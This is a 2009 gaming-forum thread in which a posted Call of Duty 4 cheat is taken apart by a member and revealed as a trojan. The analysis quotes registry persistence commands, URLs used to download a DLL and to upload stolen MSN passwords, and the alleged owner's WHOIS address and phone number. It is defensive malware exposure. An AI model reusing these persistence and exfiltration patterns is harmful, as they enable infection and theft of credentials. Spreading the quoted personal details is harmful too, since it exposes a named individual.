Gaming Community
Forum
 
Go Back   D3scene > Hot Games > Call of Duty > CoD 4 forum > Call of Duty 4 hacks
Register Blogs Live view Downloads Marketplace FAQ Members List Social Groups Calendar Search Today's Posts Mark Forums Read

HeaveN Cod4 Esp Hack (undetected)

This is a discussion on HeaveN Cod4 Esp Hack (undetected) within the Call of Duty 4 hacks forum part of the CoD 4 forum category; Features: BOX ESP Undeceted... How To Use: Start HeaveN Cod4 .exe Stard COD4 MP Join a server. Have Fun... I ...


Welcome on D3scene.com! Make sure to register - it's free and very quick! You have to register before you can post and participate in our discussions with 70000 other registered members. Downloads, user profiles and some forums can only be seen by registered members. After you create your free account you will be able to customize many options, you will have the full access to new hacks, latest cheats and last but not least will see no advertisements at all. We would love to see you around in our community!
Reply
 
LinkBack Thread Tools Display Modes
  #1  
Old 03-23-2009, 10:18 PM
Banned User
 
Join Date: Jan 2009
Posts: 1
Thanks: 0
Thanked 0 Times in 0 Posts
Reputation: 0
Rep Power: 0
DreaMan is an unknown quantity at this point
Lightbulb HeaveN Cod4 Esp Hack (undetected)

Features:
BOX ESP
Undeceted...

How To Use:
Start HeaveN Cod4.exe
Stard COD4 MP
Join a server.

Have Fun...

I tried this esp hack.
It was working 16.03.2009.

QUOTE...

link removed
Reply With Quote
D3scene
Welcome to D3scene - probably the best location for all Gamers.

To participate in our friendly environment you have to register. After completing registration you will have full access to all threads and features. We care about members and try to make your stay as pleasant as possible. We are unique with the following feature for members - you will not see a single Advertisement!


The best: registration is completely free. It will not cost you a single penny or harm you in any way. You will lose nothing except 1 minute of your time. So why not register? We would be happy to see you around!
  #2  
Old 03-24-2009, 06:42 PM
Guru

 
Join Date: Mar 2009
Posts: 80
Thanks: 0
Thanked 13 Times in 8 Posts
Reputation: 207
Rep Power: 2
CampStaff has a spectacular aura aboutCampStaff has a spectacular aura aboutCampStaff has a spectacular aura about
Send a message via MSN to CampStaff
Well, first glance, when we download it, it shows the exe modified date as being 3/23/09, but the dll was modified 2/6/09. So the exe was made a month after the cheat was.

Lets disassemble and hex, shall we:


First thing that happens is when we do that, the exe shows its binded; there are two exe's as your "heaven.exe". Only reason you'd do that is to hide your trojan 'inside' a loader.

Soooo lets disassemble each exe, cikti.exe and new heaven.exe:

Taking cikti.exe first ( since its bigger and by names alone, would be my first choice to be a trojan name ) we find:

Code:
oleaut32.dll    SysFreeString   SysReAllocStringLen   SysAllocStringLen advapi32.dll    RegQueryValueExA    RegOpenKeyExA   RegCloseKey user32.dll    GetKeyboardType   DestroyWindow   LoadStringA   MessageBoxA   CharNextA kernel32.dll    GetACP    Sleep   VirtualFree   VirtualAlloc    GetTickCount    QueryPerformanceCounter   GetCurrentThreadId    InterlockedDecrement    InterlockedIncrement    VirtualQuery    WideCharToMultiByte   MultiByteToWideChar   lstrlenA    lstrcpynA   LoadLibraryExA    GetThreadLocale   GetStartupInfoA   GetProcAddress    GetModuleHandleA    GetModuleFileNameA    GetLocaleInfoA    GetLastError    GetCommandLineA   FreeLibrary   FindFirstFileA    FindClose   ExitProcess   ExitThread    CreateThread    CompareStringA    WriteFile   UnhandledExceptionFilter    SetFilePointer    SetEndOfFile    RtlUnwind   ReadFile    RaiseException    GetStdHandle    GetFileSize   GetFileType   CreateFileA   CloseHandle kernel32.dll    TlsSetValue   TlsGetValue   LocalAlloc    GetModuleHandleA  user32.dll    CreateWindowExA   WindowFromPoint   WaitMessage   UpdateWindow    UnregisterClassA    UnhookWindowsHookEx   TranslateMessage    TranslateMDISysAccel    TrackPopupMenu    SystemParametersInfoA   ShowWindow    ShowScrollBar   ShowOwnedPopups   SetWindowsHookExA   SetWindowPos    SetWindowPlacement    SetWindowLongW    SetWindowLongA    SetTimer    SetScrollRange    SetScrollPos    SetScrollInfo   SetRect   SetPropA    SetParent   SetMenuItemInfoA    SetMenu   SetForegroundWindow   SetFocus    SetCursor   SetClassLongA   SetCapture    SetActiveWindow   SendMessageW    SendMessageA    ScrollWindow    ScreenToClient    RemovePropA   RemoveMenu    ReleaseDC   ReleaseCapture    RegisterWindowMessageA    RegisterClipboardFormatA    RegisterClassA    RedrawWindow    PtInRect    PostQuitMessage   PostMessageA    PeekMessageW    PeekMessageA    OffsetRect    OemToCharA    MsgWaitForMultipleObjects   MessageBoxA   MapWindowPoints   MapVirtualKeyA    LoadStringA   LoadKeyboardLayoutA   LoadIconA   LoadCursorA   LoadBitmapA   KillTimer   IsZoomed    IsWindowVisible   IsWindowUnicode   IsWindowEnabled   IsWindow    IsRectEmpty   IsIconic    IsDialogMessageW    IsDialogMessageA    IsChild   InvalidateRect    IntersectRect   InsertMenuItemA   InsertMenuA   InflateRect   GetWindowThreadProcessId    GetWindowTextA    GetWindowRect   GetWindowPlacement    GetWindowLongW    GetWindowLongA    GetWindowDC   GetTopWindow    GetSystemMetrics    GetSystemMenu   GetSysColorBrush    GetSysColor   GetSubMenu    GetScrollRange    GetScrollPos    GetScrollInfo   GetPropA    GetParent   GetWindow   GetMessagePos   GetMessageA   GetMenuStringA    GetMenuState    GetMenuItemInfoA    GetMenuItemID   GetMenuItemCount    GetMenu   GetLastActivePopup    GetKeyboardState    GetKeyboardLayoutNameA    GetKeyboardLayoutList   GetKeyboardLayout   GetKeyState   GetKeyNameTextA   GetIconInfo   GetForegroundWindow   GetFocus    GetDesktopWindow    GetDCEx   GetDC   GetCursorPos    GetCursor   GetClipboardData    GetClientRect   GetClassLongA   GetClassInfoA   GetCapture    GetActiveWindow   FrameRect   FindWindowA   FillRect    EqualRect   EnumWindows   EnumThreadWindows   EnumChildWindows    EndPaint    EnableWindow    EnableScrollBar   EnableMenuItem    DrawTextA   DrawMenuBar   DrawIconEx    DrawIcon    DrawFrameControl    DrawEdge    DispatchMessageW    DispatchMessageA    DestroyWindow   DestroyMenu   DestroyIcon   DestroyCursor   DeleteMenu    DefWindowProcA    DefMDIChildProcA    DefFrameProcA   CreatePopupMenu   CreateMenu    CreateIcon    ClientToScreen    CheckMenuItem   CallWindowProcA   CallNextHookEx    BeginPaint    CharNextA   CharLowerBuffA    CharLowerA    CharUpperBuffA    CharToOemA    AdjustWindowRectEx    ActivateKeyboardLayout  gdi32.dll   UnrealizeObject   StretchBlt    SetWindowOrgEx    SetWinMetaFileBits    SetViewportOrgEx    SetTextColor    SetStretchBltMode   SetROP2   SetPixel    SetEnhMetaFileBits    SetDIBColorTable    SetBrushOrgEx   SetBkMode   SetBkColor    SelectPalette   SelectObject    SaveDC    RestoreDC   Rectangle   RectVisible   RealizePalette    PlayEnhMetaFile   PatBlt    MoveToEx    MaskBlt   LineTo    IntersectClipRect   GetWindowOrgEx    GetWinMetaFileBits    GetTextMetricsA   GetTextExtentPoint32A   GetSystemPaletteEntries   GetStockObject    GetRgnBox   GetPixel    GetPaletteEntries   GetObjectA    GetEnhMetaFilePaletteEntries    GetEnhMetaFileHeader    GetEnhMetaFileBits    GetDeviceCaps   GetDIBits   GetDIBColorTable    GetDCOrgEx    GetCurrentPositionEx    GetClipBox    GetBrushOrgEx   GetBitmapBits   GdiFlush    ExcludeClipRect   DeleteObject    DeleteEnhMetaFile   DeleteDC    CreateSolidBrush    CreatePenIndirect   CreatePalette   CreateHalftonePalette   CreateFontIndirectA   CreateDIBitmap    CreateDIBSection    CreateCompatibleDC    CreateCompatibleBitmap    CreateBrushIndirect   CreateBitmap    CopyEnhMetaFileA    BitBlt  version.dll   VerQueryValueA    GetFileVersionInfoSizeA   GetFileVersionInfoA kernel32.dll    lstrcpyA    lstrcmpA    WriteFile   WaitForSingleObject   VirtualQuery    VirtualAlloc    Sleep   SizeofResource    SetThreadLocale   SetFilePointer    SetEvent    SetErrorMode    SetEndOfFile    ResumeThread    ResetEvent    ReadFile    RaiseException    QueryPerformanceFrequency   QueryPerformanceCounter   MultiByteToWideChar   MulDiv    LockResource    LoadResource    LoadLibraryA    LeaveCriticalSection    InitializeCriticalSection   GlobalFindAtomA   GlobalDeleteAtom    GlobalAddAtomA    GetWindowsDirectoryA    GetVersionExA   GetVersion    GetTimeZoneInformation    GetTickCount    GetThreadLocale   GetTempPathA    GetSystemDirectoryA   GetStdHandle    GetProcAddress    GetModuleHandleA    GetModuleFileNameA    GetLocaleInfoA    GetLocalTime    GetLastError    GetFullPathNameA    GetFileSize   GetFileAttributesA    GetExitCodeThread   GetEnvironmentVariableA   GetDiskFreeSpaceA   GetDateFormatA    GetCurrentThreadId    GetCurrentProcessId   GetCPInfo   FreeResource    InterlockedIncrement    InterlockedExchange   InterlockedDecrement    FreeLibrary   FormatMessageA    FindResourceA   FindFirstFileA    EnumCalendarInfoA   EnterCriticalSection    DeleteFileA   DeleteCriticalSection   CreateThread    CreateProcessA    CreateMutexA    CreateFileA   CreateEventA    CompareStringA    CloseHandle advapi32.dll    RegQueryValueExA    RegQueryInfoKeyA    RegOpenKeyExA   RegFlushKey   RegEnumValueA   RegEnumKeyExA   RegDeleteValueA   RegCreateKeyExA   RegCloseKey shell32.dll   ShellExecuteA wsock32.dll   WSACleanup    WSAStartup    gethostbyname   socket    send    recv    inet_ntoa   inet_addr   htons   connect   closesocket oleaut32.dll    GetErrorInfo    SysFreeString ole32.dll   OleInitialize   CoTaskMemFree   StringFromCLSID   CoCreateInstance    CoUninitialize    CoInitialize  kernel32.dll    Sleep oleaut32.dll    SafeArrayPtrOfIndex   SafeArrayGetUBound    SafeArrayGetLBound    SafeArrayCreate   VariantChangeType   VariantCopy   VariantClear    VariantInit comctl32.dll    _TrackMouseEvent    ImageList_SetIconSize   ImageList_GetIconSize   ImageList_Write   ImageList_Read    ImageList_DragShowNolock    ImageList_DragMove    ImageList_DragLeave   ImageList_DragEnter   ImageList_EndDrag   ImageList_BeginDrag   ImageList_Remove    ImageList_DrawEx    ImageList_Draw    ImageList_GetBkColor    ImageList_SetBkColor    ImageList_Add   ImageList_SetImageCount   ImageList_GetImageCount   ImageList_Destroy   ImageList_Create  advapi32.dll    CryptDestroyHash    CryptHashData   CryptCreateHash   CryptGetHashParam   CryptReleaseContext   CryptAcquireContextA  crypt32.dll   CryptUnprotectData  advapi32.dll    CredEnumerateA  secur32.dll   GetUserNameExA
Wow. Now.. just some of those are good ( used for cheating ) but.. functions like the Crypt_ ones.. are not needed. But eh.. maybe its not a virus/trojan. Lets move on further in our findings.

Code:
 check.bat     cmd /c REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"  /V Shell /D "explorer.exe
Umm. why are you adding a key to registry for shell to interfere with explorer.exe?

Code:
cmd /c REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V    /D "     " /f   
   del check.bat      checksystem.bat   del checksystem.bat
   SystemRoot    MAHUAHUAHU HAUAHU  ÿ=   asidasdasdkasd adlkasndladn 243l  dasdlkm3pr ld fldsf kf slks   Error          delme.bat      LgzAzxaaKl~\qmg    user32.dll  
   LgzKlx\va}b        ntcom.dll   #   http://www.wardomania.com/ntcom.dll    StartTheHook   
   desklop.ini
Now we are getting somewhere. As we see, your cheat now seems to download a file from wardomania, then captures whats on desktop ( its desktop, not desklop.. learn to spell for win! )

Lets continue with our rudimentary analysis, before we upload to a more professional one
:

Code:
Msn Sifreleri:
    ie   multipart/form-data    userfile      http://www.wardomania.com/1stupload.php .   http://www.wardomania.com/status.php?username=     &computername=
Seems after you download your trojan dll into the zombie computer, you gain access and have their info sent to your website. Well about that website. You should have done your homework .. because we got you:
Quote:
Domain name: wardomania.com

Registrant Contact:
Shekshy
Harikalar Diyari ()

Fax:
174 sok no 12 daire 3
Izmir, TR 35550
TR

Administrative Contact:
Shekshy
Harikalar Diyari ()
+90.5332541424
Fax: +1.5555555555
174 sok no 12 daire 3
Izmir, TR 35550
TR

Technical Contact:
Shekshy
Harikalar Diyari ()
+90.5332541424
Fax: +1.5555555555
174 sok no 12 daire 3
Izmir, TR 35550
TR

Status: Locked

Name Servers:
ns1.turkbox.net
ns2.turkbox.net

Creation date: 09 Sep 2007 12:25:08
Expiration date: 09 Sep 2009 12:25:08
So, Harikalar nice to meet you. Theres alot in this exe, but lets just jump to the chase; Anubis:

Anubis - Anubis Analysis
Quote:
Autostart capabilities: This executable registers processes to be executed at system start. This could result in unwanted actions to be performed automatically.

Creates files in the Windows system directory: Malware often keeps copies of itself in the Windows directory to stay undetected by users.

Performs File Modification and Destruction: The executable modifies and destructs files which are not temporary.

Spawns Processes: The executable produces processes during the execution.

Performs Registry Activities: The executable reads and modifies register values. It also creates and monitors register keys.
Well.. lets start..
It adds these files to the host computer:

Quote:
check.bat
C:\WINDOWS\scvhost.exe
\Device\RasAcd
C:\Dokumente und Einstellungen\Administrator\Anwendungsdaten\ntcom. dll
it reads these files:

Quote:
C:\WINDOWS\AppPatch\sysmain.sdb
C:\WINDOWS\AppPatch\systest.sdb
\Device\NamedPipe\ShimViewer
c:\
c:\cikti.exe
C:\WINDOWS\
c:\check.bat
C:\WINDOWS\AppPatch\sysmain.sdb
C:\WINDOWS\AppPatch\systest.sdb
\Device\NamedPipe\ShimViewer
C:\WINDOWS\system32\
C:\WINDOWS\AppPatch\sysmain.sdb
C:\WINDOWS\AppPatch\systest.sdb
\Device\NamedPipe\ShimViewer
C:\WINDOWS\system32\
C:\WINDOWS\AppPatch\sysmain.sdb
C:\WINDOWS\AppPatch\systest.sdb
\Device\NamedPipe\ShimViewer
C:\WINDOWS\system32\
and adds these keys to registry:

Quote:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon "" = explorer.exe C:\WINDOWS\scvhost.exe
HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Run "" = C:\WINDOWS\scvhost.exe
seems he wants to fake a Windows file ( svchost.exe ) with his ( s'c'vhost.exe ).

Anyways, again, thanks for your trojan Harikalar Diyari. Its been an experience.

Last edited by CampStaff; 03-24-2009 at 07:34 PM.
Reply With Quote
  #3  
Old 03-26-2009, 03:16 PM
Newbie

 
Join Date: Mar 2009
Posts: 1
Thanks: 0
Thanked 0 Times in 0 Posts
Reputation: 0
Rep Power: 1
KiSeL is an unknown quantity at this point
cool hack
Reply With Quote
  #4  
Old 03-26-2009, 08:10 PM
DutchNinja's Avatar
Mentor

 
Join Date: Feb 2009
Location: Holland->Jullianadorp
Posts: 134
Thanks: 4
Thanked 4 Times in 4 Posts
Reputation: 114
Rep Power: 1
DutchNinja will become famous soon enoughDutchNinja will become famous soon enough
Campstaff give me a TuT how u do this? campstaff!
Reply With Quote
  #5  
Old 03-29-2009, 04:21 AM
Newbie

 
Join Date: Nov 2008
Posts: 3
Thanks: 0
Thanked 0 Times in 0 Posts
Reputation: 0
Rep Power: 1
freebullets is an unknown quantity at this point
Epic
Reply With Quote
  #6  
Old 04-17-2009, 01:18 AM
Wannabe Member

 
Join Date: Apr 2009
Posts: 15
Thanks: 0
Thanked 0 Times in 0 Posts
Reputation: 2
Rep Power: 1
Riku98523 is an unknown quantity at this point
Lol wow that got got owned.
Reply With Quote
  #7  
Old 09-06-2009, 02:32 PM
Newbie

 
Join Date: Sep 2009
Posts: 1
Thanks: 0
Thanked 0 Times in 0 Posts
Reputation: 0
Rep Power: 1
dionzor is an unknown quantity at this point
LOL owned, its great looking at HEX.

well done on the find.
Reply With Quote
  #8  
Old 09-28-2009, 05:30 PM
Newbie

 
Join Date: Sep 2009
Posts: 5
Thanks: 0
Thanked 0 Times in 0 Posts
Reputation: 0
Rep Power: 1
guymfalkon123 is an unknown quantity at this point
thx
Reply With Quote
  #9  
Old 11-08-2009, 12:04 PM
Newbie

 
Join Date: Nov 2009
Posts: 2
Thanks: 0
Thanked 0 Times in 0 Posts
Reputation: 0
Rep Power: 1
ashurov is an unknown quantity at this point
why you remove the link?
Reply With Quote
  #10  
Old 11-08-2009, 02:39 PM
Tracky's Avatar
Sexy in Pink now :D



 
Join Date: Dec 2007
Location: Germany
Posts: 807
Thanks: 124
Thanked 86 Times in 53 Posts
Reputation: 440
Rep Power: 4
Tracky is just really niceTracky is just really niceTracky is just really niceTracky is just really niceTracky is just really nice
Quote:
Originally Posted by ashurov View Post
why you remove the link?

Rly.. Just read through a Thread before answering..
This is a real senseless question.. :/
Reply With Quote
D3scene
Welcome to D3scene - probably the best location for all Gamers.

To participate in our friendly environment you have to register. After completing registration you will have full access to all threads and features. We care about members and try to make your stay as pleasant as possible. We are unique with the following feature for members - you will not see a single Advertisement!


The best: registration is completely free. It will not cost you a single penny or harm you in any way. You will lose nothing except 1 minute of your time. So why not register? We would be happy to see you around!
Reply

Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are On
Pingbacks are On
Refbacks are Off


Similar Threads
Thread Thread Starter Forum Replies Last Post
[Detected]Ubermaphack Bendik Warcraft 3 Hacks 171 07-11-2009 12:08 PM
Warcraft 1.22 MH sd333221 Warcraft 3 Hacks 67 06-03-2009 07:49 PM
[Release]Bendik's Maphack v1.22 Bendik Warcraft 3 Hacks 280 12-12-2008 02:02 AM
[YOUR CD KEY HAS BEEN DISABLED] DaUberMap + Tiehack 1.22 DaUberBird Warcraft 3 Hacks 268 11-04-2008 09:33 PM
Warcraft 3 maphack hendricius Warcraft 3 Hacks 89 08-22-2008 07:44 PM


All times are GMT +1. The time now is 08:18 AM.

Powered by vBulletin® Version 3.8.4
Copyright ©2000 - 2009, Jelsoft Enterprises Ltd.
SEO by vBSEO 3.3.0 ©2009, Crawlability, Inc.
vBulletin style developed by Transverse Styles